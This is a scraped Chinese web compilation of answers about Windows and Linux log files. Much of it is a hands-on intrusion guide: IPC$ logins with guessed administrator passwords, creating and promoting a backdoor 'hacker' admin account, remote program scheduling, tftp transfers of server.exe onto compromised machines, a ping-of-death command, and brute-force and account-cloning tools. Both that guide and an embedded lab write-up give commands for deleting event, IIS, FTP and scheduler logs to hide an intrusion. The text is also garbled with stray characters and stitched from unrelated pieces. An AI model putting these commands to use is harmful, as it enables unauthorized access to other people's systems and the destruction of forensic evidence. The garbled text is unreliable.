目前在不借助第三工具的情况下,能很快,很顺利地清除FTP、WWW还有Schedlgu日志,就是系统日志和安全日志属于Windows2000的严密守护,只能用本地的事件查看器来打开它,因为在图形界面下,加之网速又慢,如果你银子多,时间闲,还是可以清除它的。综上所述,介绍了Windows2000的日志文件以及删除方法,但是你必须是Administrator,注意必须作为管理员或管理组的成员登录才能打开安全日志记录。该过程适用于 Windows 2000 Professional 计算机,也适用于作为独立服务器或成员服务器运行的 Windows 2000 Server 计算机。
H. 如何通过dos 命令连接远程主机,连接后怎么控制
常用的DOS命令建立到远程主机的连接
net use \\ip\ipc$ "password"
/user:"username"
建立新用户
net user username password /add
修改用户密码
net
user username newpassword
激活用户
net user username
/active:yes
把用户加入到用户组
net localgroup groupname username
/add
查看远程主机的时间
net time \\ip
显示远程主机的共享资源列表
net view
\\ip
启动和停止系统服务
net start(stop) servicename
映射对方的硬扮历盘
net use z:
\\ip\c$
启动程序
at \\ip time programnane
文件复制
filename
\\ip\c$\filename
远程执行FTP命令
echo open servername > c:\ftp.txt
echo
username >> c:\ftp.txt
echo password >> c:\ftp.txt
echo get
filename c:\filename >> c:\ftp.txt
ftp -s:c:\ftp.txt
del
c:\ftp.txt
删除日志
del c:\winnt\system32\logfiles\*.*
del
c:\winnt\ssytem32\config\*.evt
del c:\winnt\system32\dtclog\*.*
del
c:\winnt\system32\*.log
del c:\winnt\system32\*.txt
del c:\winnt\*.txt
del c:\winnt\*.log
访问对方共享资源
net use \\192.168.1.1\c$
/user:administrator "123"
如果提示连接成功,你在输入
start \\192.168.1.1\c$
就打开目标机的C盘了
----------------------------------
net use \\ip\ipc$ " "
/user:" " 建立IPC空链接
net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接
net use
h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:
net use h: \\ip\c$
登陆后映射对方C:到本地为H:
net use \\ip\ipc$ /del 删除IPC链接
net use h: /del
删除映射对方到本地的为H:的映射
net user 用户名密码/add 建立用户
net user guest /active:yes
激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup
administrators 用户名 /add 把“用户”添加到管理员中使其具有管厅尘搜理员权限,注意:administrator后加s用复数
net
start 查看开启了哪些服务
net start 服务名 开启服务;(如:net start telnet, net start schele)
net stop 服务名 停止某服务
net time \\目标ip 查看对方时间
net time \\目标ip /set
设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net
view \\ip 查看对方局域网内开启了哪些共享
net config 显示系统网络设置
net logoff 断开连接的共享
net
pause 服务名 暂停某服务
net send ip "文本信息" 向对方发信息
net ver 局域网内正在使用的网络连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del
删除ipc$共享
net share c$ /del 删除C:共享
net user guest 12345
用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
netstat -a
查看开兄州启了哪些端口,常用netstat -an
netstat -n 查看端口的网络连接情况,常用netstat -an
netstat -v
查看正在进行的工作
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip
对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
tracert -参数
ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
ping ip(或域名)
向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
ping -t -l
65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows
NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息
tlist -t
以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
kill -F 进程名
加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
del -F 文件名
加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR
*.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
#2 二:
del /S /Q 目录
或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
move 盘符\路径\要移动的文件名存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fc
one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >"
是重定向命令
at id号 开启已注册的某个计划任务
at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止
at
id号 /delete 停止某个已注册的计划任务
at 查看所有的计划任务
at \\ip time 程序名(或一个命令) /r
在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口
远和登陆服务器,默认端口为23
open ip 连接到IP(属telnet登陆后的命令)
telnet 在本机上直接键入telnet
将进入本机的telnet
路径\文件名1路径\文件名2 /y
复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件
c:\srv.exe \\ip\admin$
复制本地c:\srv.exe到对方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg
将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
\\ip\admin$\svv.exe c:\ 或:\\ip\admin$\*.*
复制对方admini$共享下的srv.exe文件(所有文件)至本地C:
x 要复制的文件或目录树目标地址\目录名
复制文件和目录树,用参数/Y将不提示覆盖相同文件
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe
c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe
参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
tftp -i 对方IPput
c:\server.exe 登陆后,上传本地c:\server.exe至主机
ftp ip 端口
用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)
route
print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway
addres,接口地址Interface
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp
-a将显示出全部信息
start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令
mem
查看cpu使用情况
attrib 文件名(目录名) 查看某文件(目录)的属性
attrib 文件名 -A -R -S -H 或 +A +R +S
+H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性
dir
查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间
date /t 、
time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间
set
指定环境变量名称=要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p(或其它字符)
显示出当前以字符p(或其它字符)开头的所有环境变量
pause 暂停批处理程序,并显示出:请按任意键继续....
if
在批处理程序中执行条件处理(更多说明见if命令及变量)
goto 标签
将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)
call 路径\批处理文件名
从批处理程序中调用另一个批处理程序 (更多说明见call /?)
for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)
echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置
echo 信息 在屏幕上显示出信息
echo
信息 >> pass.txt 将"信息"保存到pass.txt文件中
findstr "Hello" aa.txt
在aa.txt文件中寻找字符串hello
find 文件名 查找某文件
title 标题名字 更改CMD窗口标题名字
color 颜色值
设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ )
139端口入侵
net
命令是139端口入侵的重中之重,整个入侵过程会多次用到它。在命令行窗口下输入net,可以看到有一大堆参数,别被这一大堆参数吓怀了,现在我来为你一一讲解。
net
use
net use
命令用于与远程主机建立IPC$(管理)连接,当你有远程计算机的用户名(通常用户名为administrator,记住它)和密码时,在命令行窗口下输入net
use\\IP\IPC$"password"/user:administrator,你就成功地建立了与远程计算机的连接。在这之后,可以对其进行管理了。net
use 还有一个用处,即映射远程机器的共享资源,输入net use z: \\IP\C$
(注意!在此之后的一切命令都是基于第一个命令的,也就是说必须先建立IPC$连接后,这些命令才会成功),打开“我的电脑”,你会发现多了一个Z盘,里面全是远程主机C盘下的东西,你在Z盘里删除了一个文件,对方C盘下的这个文件就也被删除了,所有对Z盘的操作其实就是对远程计算机的C
盘的操作。怎么样,是不是很有意思呢?
net view
net view 用于查看远程计算机有哪些共享资源,通常你会看到my
document之类的共享文件夹,输入net view \\IP即可。我个人认为net view
没有太大用处,要知道,在Windows2000中,各个硬盘都是共享的,但是如果你用net view 来查看,你会发现并无C,D,E
之类的共享资源。这是为什么呢?注意,在这之前的一些命令中,我们曾输入过IPC$,C$这样的奇怪东西,其实,Windows2000中,带"$"后缀的共享资源是隐藏的,在命令行窗口下是无法看到的,Windows2000中各个盘都是以诸如C$,D$,E$
这样的名称共享的,所以我们看不到,但确实存在,IPC$也是如此。
net share
net share 用于开放共享,输入net
share QQ=c:\tencent,你会发现多了一个名为QQ的共享资源。这个命令有慎么作用呢?假设一个主机安全做的不错,关闭了IPC$,C$,D$
等共享,那么我们就无法在139端口上建立管理连接,也无法访问对方的C盘,当我们通过别的手段进入后(如远程溢出),我们就可以用net share
开放IPC$,从而转为熟悉的139端口的入侵,开放IPC$ 的命令为net share IPC$。相应的,如果你想关闭共享,你可以加上/del 后缀,例如net
share c$ /del 就关闭了C盘的共享。
net user
net user 命令用于管理主机上的用户,仅输入不带任何参数的net
user 会列出计算机上所有的用户名。现在就让我们看看net user
命令是如何对用户进行操作的。
┎───────────────────────────────────────────────────────┒
┃
net user hacker 12345 /add 建立一个名为hacker,密码为12345的用户。
┃
┃ net user hacker /del
删除名为hacker的用户。┃
┃ net user hacker
/active:no 禁用hacker这个用户,这个用户不能再登陆此计算机。┃
┃ net user hacker
/active:yes 激活已禁用的hacker这个用户。 ┃
┃ net localgroup
administrator hacker /add 把hacker这个用户添加进管理员组,即提升hacker的权限,使之变为管理员 ┃
┖───────────────────────────────────────────────────────┚
net start /
net stop
net start / net stop 命令用于起动/停止系统服务,通常我们会net stop w3svc
(停止网页服务),然后替换网页,对此命令我不多讲,知道即可。
*at 命令,net
time
之所以把它们放在一起来讲,是因为at命令要用到net time命令的结果,一般我们先 net view
\\ip,得到远程主机的时间(假设得到的时间为9:00),然后at \\ip 9:00 telnet
就启动了telnet服务,at这个命令就是用来远程运行程序的.
(5)需要准备的工具
肉鸡猎手v1.0扫描一个网段,找出弱密码的计算机
SMBCrack
针对特定主机,暴力猜解密码
DameWare Mini Remote Control监控运程屏幕
CA.exe
克隆管理员账号
I. windowstask怎么看log
打开CSDN APP
Copyright © 1999-2020, CSDN.NET, All Rights Reserved
windows日志文件
打开APP
windows日志文件查看与清理 原创
2021-09-12 19:17:02
暗哑于秋~
码龄3年
关注
日志查看
(1) 启动Windows实验台,点击:开始 - 控制面板 - 管理工具 - 事件查看器。如下图所示。在这里插入图片描述
(2) 应用程序日志、安全日志、系统日志、DNS日志默认位置:%sys temroot%\system32\config,默认文件大小512KB,管理员可以改变这个默认大小。
安全日志文件:%systemroot%\system32\config\SecEvent.EVT;
系统日志文件:%systemroot%\system32\config\SysEvent.EVT;
应用程序日志文件:%systemroot%\system32\config\AppEvent.EVT;
DNS日志:%systemroot%\system32\config\DnsEvent.EVT;
在事件查看器中右键应用程序(或安全性、系统、DNS服务器)查看属性可以得到日志存放文件的路径,并可修改日志文件的大小,清除日志。例如选中“应用程序”右键属性,如下图:
在这里插入图片描述
选中事件查看器中左边的树形结构图中的日志类型(应用程序、安全性或系统),右击“查看”,并选择“筛选”。或者点击属性页面的筛选器标签,日志筛告桐选器将会启动。通过筛选器系统会过滤出管理员希望查看的日志记录
(3) 查看www和ftp日志文件夹下的日志文件
(由于实验环境中不允许访问互联网,无法操作得出日志文件。请参考指导书使用个人电脑进行实验。)
尝试对www服务中某一文件进行访问,则日志中则会有相应的日志记录如下图。
在这里插入图片描述
日志中记录了访问www服务的请求地址,管理员可以根据请求地址,发现网络上的攻击,管理员可根据日志信息,采取一稿高定的防护措施。
在这里插入图片描述
ftp的日志中同样会记录ftp服务的登陆用户,以及登陆之后的操作。
(4) 计划任务日志
当入侵者得到远程系统的shell之后,常会利用计划任务运行功能更加强大的木马程序,计划任务日志详细的记录的计划任务的执行时间,程序名称等详细信息。
打开计划任务文件夹,点击“高级”-查看日志,即可查看计划任务日志。
在这里插入图片描述
日志清除
(1) 删除事件查看器中的日志
主机下载使用elsave清除日志工具
下载地址:http://tools.hetianlab.com/tools/Elsave.rar
先用ipcKaTeX parse error: Undefined control sequence: \ipc at position 42: …e \\对方IP(实验台IP)\̲i̲p̲c̲ “密码” /user:“用户名”;
连接成功后,开始进行日志清除。
清除目标系统的应用程序日志输入elsave.exe -s \对方ip -l “application” -C
清除目标系统的系统日袜敬坦志输入elsave.exe -s \对方IP -l “system” -C
清除目标系统的安全日志输入elsave.exe -s \对方IP -l “security” -C
输入如下图
在这里插入图片描述
回车后可以查看远程主机内的系统日志已经被删除了
在这里插入图片描述
(2) 删除常见服务日志
IIS的日志功能,它可以详细的记录下入侵全过程,如用unicode入侵时IE里打的命令,和对80端口扫描时留下的痕迹。
手动清除:日志的默认位置:%systemroot%\system32\logfiles\w3svc1\,默认每天一个日志。进入到远程主机后(也可直接在实验台中操作),cmd下切换到这个目录下,然后 del .。或者删除某一天的日志。如果无法删除文件,首先需要停止w3svc服务,再对日志文件进行删除,使用net 命令停止服务如下:
C:>net stop w3svc
World Wide Web Publishing Service 服务正在停止。
World Wide Web Publishing Service 服务已成功停止。
日志w3svc停止后,然后清空它的日志, del .
C:>net start w3svc
清除ftp日志,日志默认位置:%systemroot%\sys tem32\logfiles\msftpsvc1\,默认每天一个日志,清除方法同上。
(3) 删除计划任务日志
先来删除计划任务日志:
在实验台中命令行进入日志所在文件夹下(%systemroot%\Tasks), 删除schedlgu.txt , 提示无法访问文件,因为另一个程序正在使用此文件。说明服务保护,需要先把服务停掉。命令行中输入net stop schele;
在这里插入图片描述
下面的服务依赖于Task Scheler 服务。停止Task Scheler 服务也会停止这些服务。
Remote Storage Engine
Task Scheler 服务正在停止. Task Scheler 服务已成功停止。
如上显示服务停掉了,同时也停掉了与它有依赖关系的服务。再来删除schedlgu.txt;
删除后需要再次启动该任务以便主机能够正常工作,输入net start schele:
在这里插入图片描述
答案
在这里插入图片描述
分析与思考
1、还有哪些途径可以发现网络中存在的攻击或者入侵。
日志文件、进程、自启动项目、网络连接、安全模式、映像劫持、CPU时间
2、清理日志能否把所有的痕迹都清理干净。
不能,还应删除操作记录,所做的每一个操作,都要被抹掉;所上传的工具,都应该被安全地删掉
补充
电脑被入侵排查方法
在攻击结束后,如何不留痕迹的清除日志和操作记录,以掩盖入侵踪迹,这其实是一个细致的技术活。你所做的每一个操作,都要被抹掉;你所上传的工具,都应该被安全地删掉。
打开CSDN,阅读体验更佳
什么是Windows日志?_运维有小邓@的博客_windows日志
Windows日志特指Windows操作系统中各种各样的日志文件,如应用程序日志,安全日志、系统日志、Scheler服务日志、FTP日志、WWW日志、DNS服务器日志等,这些根据你的系统开启的服务的不同而有所不同。我们在系统上进行一些操作时,这些日志文件通...
继续访问
Windows升级日志文件可以删除吗?_石大师的博客_日志文件可以...
3、等到搜索完毕后,按下CTRL + A 快捷键,全选Log文件,按下del键删除。 4、最后清空回收站,就可以删除Windows升级日志文件了。
继续访问
Windows系统冗余log的清理bat脚本
Windows系统冗余log的清理bat脚本
继续访问
热门推荐 Windows系统日志分析
Windows系统的日志文件存放在C:/windows/system32/winevt/logs目录下 Windows系统的日志分为三种 系统日志:System.evtx (系统组件等日志) 应用程序日志: Application.evtx (应用程序等日志) 安全日志:Security.evtx(系统登录等日志) win+r打开运行窗口中输入eventvwr.msc打开时间查看器,或者cmd中输入eventvwr.msc ...
继续访问
Widows Log Files (windows日志文件)_DoveFeng的博客_w11日志...
DNS Client service默认没有设置日志纪录。可以通过在%systemroot%/system32 目录下手动添加dnsrslvr.log文件,用来纪录事件日志 :/WINDOWS/system32/>echo "" > dnsrslvr.log 在Windows XP和windows server2003中,必须明显指定给 NETWORK...
继续访问
win10如何查看服务器日志文件,高手解读win10怎么查看日志文件的操作教程...
1、右键左下角"菜单"键,然后点击"事件查看器"。 2、然后点击"Windows日志",就能够进行查看了。 win10怎么查看日志文件的问题是不是大家根据以上提供的教程就处理好了呢?我们高兴能够在这里帮助到你。
继续访问
最新发布 应急响应-日志分析
日志概述在Windows系统中,日志文件包括:系统日志、安全性日志、应用程序日志:如何查看:右键我的电脑-管理-系统工具-事件查看器,或者eventvwr查看事件查看器打开Windows系统的事件查看器,右键单击系统或安全日志,选择筛选当前日志,在筛选器中输入下列事件ID即可。系统:1074,通过这个事件ID查看计算机的开机、关机、重启的时间以及原因和注释。6005,表示计算机日志服务已启动,如果出现了事件ID为6005,则表示这天正常启动了系统。
继续访问
windows查看服务器启动日志文件,windows服务器日志查看工具
windows服务器日志查看工具 内容精选换一换本节操作指导用户查看Windows弹性云服务器的登录日志。本节操作以2012操作系统云服务器为例。登录弹性云服务器。选择“开始 > 管理工具 > 事件查看器 ”。打开“ Windows日志 > 安全 > 筛选当前日志”。筛选事件ID为4776的事件即为远程登录日志。您还可以使用4624和4625查看登录信息。4624:Wind...
继续访问
windows日志总结_ordar123的博客_windows日志
windows日志总结 开启审核策略 运行secpol.msc可以打开本地安全策略,依次点开本地策略-审核策略。可以看到windows默认情况是没有开启审核策略的,不开启策略的话,windows就不会记录某些事件,比如登录事件,进程创建事件等等。
继续访问
Windows系统服务器系统日志在哪里查看?_PAINzw的博客_服务器...
5.根据文件位置,咱们去C盘/Windows/system32/winevt/logs找到系统日志,即可查看,我个人觉得一个一个找文件挺麻烦的,所以我是直接找到system32文件夹后直接搜索【logs】文件夹,一步到位 注意:选择系统日志可进行查看,并且在日志管理页面中...
继续访问
在windows下,使用命令清除日志信息
清除日志信息的命令:del C:/winnt/system32/logfiles/*.* del C:/winnt/system32/config/*.evt del C:/winnt/system32/dtclog/*.* del C:/winnt/system32/*.log del C:/winnt/system32/*.txt del C:/winnt/*.txt
继续访问
安全清理大部分的C盘内存(一般10GB以上)
1.我电脑清理后腾出了80G的C盘空间,用了以下方法 如果感觉有用请关注,点赞,收藏! 下次分享更有用的干货~ 1.先用清理软件(360,腾讯管家) 用360清理发现,windows search日志占用了70多个G空间,先清除! 该日志文件有撒用呢? 如果没有这个日志文件,我们在文件系统进行搜索的时候就会比较慢了,而且还会出现这样的字样。 这个日志主要是用来存索引的, 删除了只会在下次搜索东西的时候比较慢! 对其他没有任何影响!!!! 2.禁用该日志文件 1...
继续访问
计算机操作日志文件,教你完全读懂Windows日志文件
日志文件,它记录着Windows 及其各种服务运行的每个细节,对加强 Windows的稳定和安全性,起着十分 重要的作用。但许多用户不注意对它保护,一些“不速之客”很随便 就将日志文件清空,给系统带来严重的安全隐患。一、什么是日志文件日志文件是Windows 中一个比较特殊的文件,它记录着Windows 中所发作 的一切,如各种系统服务的启动、运行、关闭等信息。 Windows日志包括应用程序、安...
继续访问
windows日志查看与清理
使用elsave清除日志工具 先用ipc$管道进行连接,在cmd命令提示符下输入 net use \\对方IP(实验台IP)\ipc$ "密码" /user:"用户名"; 连接成功后,开始进行日志清除。 清除目标系统的应用程序日志输入elsave.exe -s \\对方ip -l "application" -C 清除目标系统的系统日志输入elsave.exe -s \\对方IP -l "system" -C 清除目标系统的安全日志输入elsave.ex...
继续访问
Windows下如何查看十几G的日志文件
周二工作中,为了查明一个bug产生的原因,记录了近30个小时的test环境的日志文件hrmkq.log。拿到的日志文件解压后有30G,这是任何文本编辑器都无法处理的大小。这里介绍一下windows环境分析大文件的好工具——LogViewer (http://www.uvviewsoft.com/logviewer/index.htm)。 官方介绍 UVviewsoft LogViewer 是一款无限大小的文本日志文件的查看器。(UVviewsoft LogViewer is a viewer for t
继续访问
2.3 IIS日志分析:手动清除IIS日志
IIS 日志
继续访问
Windows环境使用tail命令动态查询日志文件
Windows环境使用tail命令动态查询日志文件
继续访问
Windows常用快捷键
Windows常用快捷键 系统快捷键 快捷键 作用 Windows+E 打开我的电脑 Window+Prtscr 屏幕截图并放在剪贴板里面,并存储文件到图片文件夹 Window+数字键 打开任务栏第几个应用程序 Window+D 显示桌面/最小化窗口,可返回 Window+Q 搜索 Window+M 最小化所有窗口/不可返回 Window+R 打开运行对话框...
继续访问
日志文件
1. 日志文件 日志文件可以记录系统在什么时间、哪个主机、哪个服务、出现了什么信息等内容,这些信息也包括用户识别数据、系统故障排除须知等信息 日志文件就是记录系统活动信息的几个文件,如:何时、何地(来源IP)、何人(什么服务名称)、做了什么操作(信息登录)换句话说就是记录系统在什么时候由哪个进程做了什么样的操作时,发生了何种的事件 日志文件的作用: 解决系统方面的错误 解决网络服务的问题 过往事件记事本 ...
继续访问
win7开机慢_电脑慢怎么办?小白如何快速提升电脑的速度,只要这9步!全网最详细、简单落地,小白易上手操作方法...
重要说明:按此教程操作完成后,电脑速度至少提升100%以上试想一下,如果电脑反应速度慢,我们的效率如何提升?别人1秒钟可以操作的事情,我们可能10秒还完成不了,别人1小时能操作的事情,我们可能3小时间都完成不了,这就是工欲善其事,必先利其器!创业就跟打战一样,俗话说商场如战场,落后就会挨打,中国近两百年就是这样过来的,不过,现在中国慢慢赶上来了,各种先进的武器装备都奋力赶上,很多还做到世界第一。所...
继续访问
关于Windows日志
什么是 Windows日志? Windows网络操作系统都设计有各种各样的日志文件,如应用程序日志,安全日志、系统日志、Scheler服务日志、FTP日志、WWW日志、DNS服务器日志等等,这些根据你的系统开启的服务的不同而有所不同。我们在系统上进行一些操作时,这些日志文件通常会记录下我们操作的一些相关内容,这些内容对系统安全工作人员相当有用。比如说有人对系统进行了IPC探测,系统就会在安全日志里迅速地记下探测者探测时所用的IP、时间、用户名等。 应用程序日志记录的是应用程序在系统中产生的事件信息。
继续访问
WindowsNT/2000的系统日志文件
一.Windows日志系统 WindowsNT/2000的系统日志文件有应用程序日志AppEvent.Evt、安全日志SecEvent.Evt、系统日志SysEvent.Evt,根据系统开通的服务还会产生相应的日志文件。例如,DNS服务器日志DNS Serv.evt,FTP日志、WWW日志等。日志文件默认存放位置:%systemroot%\system32\config,默认文件大小51
继续访问
SAP 事务代码 sm21-系统日志
对Windows下日志清除的一些总结
这几日研究的课题是系统日志的清理,主要参考的书籍是《暗战强人. 黑客攻防实战高级演练》,虽然讲到的技术比较老,但对于刚入门 的我还是收获较大。 在Windows系统中,日志文件通常有应用程序日志、安全日志、系统日志、DNS服务器日志、FTP日志、WWW日志等,其扩展名为.log、 .txt。我们先来熟悉下各个日志文件存放的位置及相应的服务。 系统
继续访问
在windows服务器实现Linux cat/dev/null > 文件 功能
1. 前提是windows装了powershell 2. 使用Clear-Content命令清空文件中内容 > 所谓清空文件,就是将一个文本文件里面的内容全部删除,但是不删除文件本身 3. 案例 PS E:\ifield\logs> PS E:\ifield\logs> Clear-Content .\log.log PS E:\ifield\logs> ...
继续访问
windows日志文件
J. linux message 日志有如下信息是什么情况
日志的概念为了维护自身系统资源的运行状况,计算机系统一般都会有相应的日志记录系统有关日常事件或者误操作警报的日期及时间戳信息。这些日志信息对计算机犯罪调查人员非常有用。所谓日志(Log)是指系统所指定对象的某些操作和其操作结果按时间有序的集合。每个日志文饥绝件由日志记录组成,每条日志记录描述了一次单独的系统事件。通常情况下,系统日志是用户可以直接阅读的文本文件,其中包含了一个时间戳和一个信息或者子系统所特有的其他信息。日志文件为服务器、工作站、防火墙和应用软件等IT资源相关活动记录必要的、有价值的信息,这对系统监控、查询、报表和安全审计是十分重要的。日志文件中的记录可提供以下用途:监控系统资源;审计用户行为;对可疑行为进行告警;确定入侵行为的范围;为恢复系统皮山提供帮助;生成调查报告;为打击计算机犯罪提供证据来源。日志的特点日志记录着系统中特定事件的相关活动信息,从计算机取证角度看,日志主要有以下特点:(1)不易读懂虽然大部分系统的日志都以文本的形式记录,但由于各系统日志格式不一致,不熟悉各类日志格式就很难获取有用的信息。同时有相当部分应用系统并不采用文本格式记录着日志信息,必须借助专用的工具分析这些日志,否则很难读懂其中的日志信息。(2)数据量大通常对外服务产生的日志文件如Web服务日志、防火墙、入侵检测系统日志和数据库日志以及各类服务器日志等都很大,一个日志文件一天产生的容量少则几十兆、几百兆,多则有几个G,几十个G,这使得获取和分析日志信息变得很困难。(3)不易获取由于网络中不同的操作系统、应用软件、网络设备和服务产生不同的日志文件,即使相同的服务如IIS也可采用不同格式的日志文件记录日志信息。目前国际上还没有形成标准的日志格式,各系统开发商和网络设备生产商往往根据各自的需要制定自己的日志格式,使得不同系统的日志格式和存储方式有所差别。如何获取各类不同系统产生的不同日志文件作为打击计算机犯罪者的电子证据变得尤为困难。(4)不同日志之间存在某种必然的联系一个系统的日志是对本系统涉及的运行状况的信息按时间顺序作一简单的记录,仅反映本系统的某些特定事件的操作情况,并不完全反映某一用户的整个活动情况。一个用户在网络活动的过程中会在很多的系统日志中留下痕迹,如防火墙IDS日志、操作系统日志等,这些不同的日志之间存在某种必然的联系来反映用户的活动情况。只有将多个系统的日志结合起来分析,才能准确反映用户活动情况。(5)容易被修改、破坏甚至伪造产生系统日志的软件通常为应用系统而不是作为操作系统的子系统运行,所产生的日志记录容易遭到恶意的破坏或修改。系统日志通常存储在系统未经保护的目录中,并以文本方式存储,未经加密和校验处理,没有提供防止恶意篡改的有效保护机制。因此,日志文件并不一定是可靠的,入侵者可能会篡改日志文件,从而不能被视为有效的证据。由于日志是直接反映入侵者痕迹的,烂握姿在计算机取证中扮演着重要的角色,入侵者获取系统权限窃取机密信息或破坏重要数据后往往会修改或删除与其相关的日志信息,甚至根据系统的漏洞伪造日志以迷惑系统管理员和审计。 Unix系统日志在Unix下,最常用的存放日志文件的目录是: /usr/adm 早期版本的 Unix /var/adm 较新版本的 Unix /var/log 用于Solaris,Linux,BSD等 /etc Unix system V早期版本 在这些目录下,或其子目录下,你可以找到以下日志文件(也许是其中的一部分): lastlog 记录用户最后一次成功登录时间 loginlog 不良的登陆尝试记录 messages 记录输出到系统主控台以及由syslog系统服务程序产生的消息 utmp 记录当前登录的每个用户 utmpx 扩展的utmp wtmp 记录每一次用户登录和注销的历史信息 wtmpx 扩展的wtmp vold.log 记录使用外部介质出现的错误 xferkig 记录Ftp的存取情况 sulog 记录su命令的使用情况 acct 记录每个用户使用过的命令 aculog 拨出自动呼叫记录 记录输出到系统主控台以及由syslog系统服务程序产生的消息。syslog采用可配置的、统一的系统登记程序,随时从系统各处接受log请求,然后根据/etc/syslog.conf中的预先设定把log信息写入相应文件中、邮寄给特定用户或者直接以消息的方式发往控制台。值得注意的是,为了防止入侵者修改、删除messages里的记录信息,可以采用用打印机记录或跨越网络登记的方式来挫败入侵者的企图。任何程序都可以通过syslog记录事件。Syslog可以记录系统事件,可以写到一个文件或设备中,或给用户发送一个信息。它能记录本地事件或通过网络记录到另一台主机上的事件。 Syslog依据两个重要的文件:/sbin/syslogd(守护进程)和/etc/syslog.conf配置文件。习惯上,多数syslog信息被写到/var/adm或/ar/log目录下的信息文件中(*message.)。一个典型的syslog记录包括生成程序的名字和一个文本信息,它还包括一个设备和一个行为级别(但不在日志中出现)。 Windows系统日志以Windows2000/XP为例,日志文件通常有应用程序日志,安全日志、系统日志、DNS服务器日志、FTP日志、WWW日志等等。 日志文件默认位置: 应用程序日志、安全日志、系统日志、DNS日志默认位置:%sys temroot%\sys tem32\config,默认文件大小512KB,管理员都会改变这个默认大小。 安全日志文件:%sys temroot%\sys tem32\config\SecEvent.EVT 系统日志文件:%sys temroot%\sys tem32\config\SysEvent.EVT 应用程序日志:%sys temroot%\sys tem32\config\AppEvent.EVT Internet信息服务FTP日志默认位置:%sys temroot%\sys tem32\logfiles\msftpsvc1\ 默认每天一个日志 Internet信息服务WWW日志默认位置:%sys temroot%\sys tem32\logfiles\w3svc1\ 默认每天一个日志 Scheler服务日志默认位置:%sys temroot%\schedlgu.txt 以上日志在注册表里的键: 应用程序日志,安全日志,系统日志,DNS服务器日志,它们这些LOG文件在注册表中的位置: HKEY_LOCAL_MACHINE\sys tem\CurrentControlSet\Services\Eventlog 有的管理员很可能将这些日志重定位。其中EVENTLOG下面有很多的子表,里面可查到以上日志的定位目录。 Schedluler服务日志在注册表中的位置: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchelingAgent Windows NT/2000主要有以下三类日成记录系统事件: (1)应用程序日志记录由应用程序产生的事件。例如,某个数据库程序可能设定为每次成功完成备份操作后都向应用程序日志发送事件记录信息。应用程序日志中记录的时间类型由应用程序的开发者决定,并提供相应的系统工具帮助用户使用应用程序日志。 (2)系统日志记录由Windows NT/2000操作系统组件产生的事件,主要包括驱动程序、系统组件和应用软件的崩溃以及数据丢失错误等。系统日志中记录的时间类型由Windows NT/2000操作系统预先定义。 (3)安全日志记录与安全相关事件,包括成功和不成功的登录或退出、系统资源使用事件等。与系统日志和应用程序日志不同,安全日志只有系统管理员才可以访问。 Windows 